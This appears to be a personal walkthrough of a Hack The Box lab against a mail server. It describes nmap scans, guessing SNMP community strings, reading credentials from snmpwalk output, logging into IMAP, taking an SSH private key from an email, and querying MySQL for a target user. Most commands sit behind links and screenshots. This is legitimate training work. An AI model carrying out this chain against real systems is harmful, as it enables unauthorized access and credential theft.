First add the target IP, 10.129.202.20, to the .zshrc file and source it.
echo "IP=10.129.202.20" >> .zshrc && source .zshrc
This will allow me to use the $IP variable in any shell I open. The next thing I do is an NMAP scan of the server.
nmap \$IP -sC -sV -oA nmap_scan
This will allow me to review the results of the scan as needed and provide a detailed copy. ![[01-addIP.png]] ![[02-Namp scan.png]]
NMAP returned a total of 5 ports open on the mail server, 22(SSH), 110 (pop3), 143 (imap), 933 (imap/secure), and 995 (pop3/secure).
Using openssl [[Commands Used#^3|3]] I was able to connect but not execute any commands. Not sure where to go, I looked online and saw the server is also running SNMP (UDP Port 161). This was verified by running an NMAP UDP scan. [[Commands Used#^4|4]] ![[03-openssl_attempt.png]] ![[04-nmap_Udp.png]] With 2 new ports opened up, this might be another way in. I used onesixtyone [[Commands Used#^5|5]] to see what community strings I could find and it found "backup". ![[05-onesixtyone.png]] Since I have a community string, I use snmp walk to see what I could find and tee the results to a text [[Commands Used#^6|6]] file for later review. At the end of the results I see some interesting information for user tom. ![[06-snmpwalk_results.png]] Having a username and password, when I tried using it with the OpenSSL command [[Commands Used#^3|3]], I gained access. ![[07-openssl_login.png]]
I start off by seeing what mail boxes are in the server and start with inbox. Here I see there's 1 email and when I read it, I see it's an OPENSSH Private Key. I copied and save it to use later. The rest of the mail boxes were empty. ![[08-Imap-SSH.png]] Having Toms private key, I modify the file permissions [[Commands Used#^7|7]] so I can use with with SSH. [[Commands Used#^8|8]] ![[09-SSH.png]]
Having SSH'd in to the system, I checked to see what sudo commands Tom might have [[Commands Used#^9|9]] but there aren't any. Next I check to see what files Tom has in his home directory [[Commands Used#^10|10]]. The I notice is .mysql_history, so I read though it. [[Commands Used#^11|11]] ![[10-SSH_tom_homedir.png]]
I log in to mysql with the password I found earlier [[Commands Used#^12|12]] and see what databases there are. From here I select users and see what columns there are. [[Commands Used#^13|13]] This will make finding the target easier. Finally I search for user 'htb'. [[Commands Used#^14|14]] ![[11-mysql_login.png]]![[12-mysql_columns.png]] ![[13-mysql_htb_users.png]]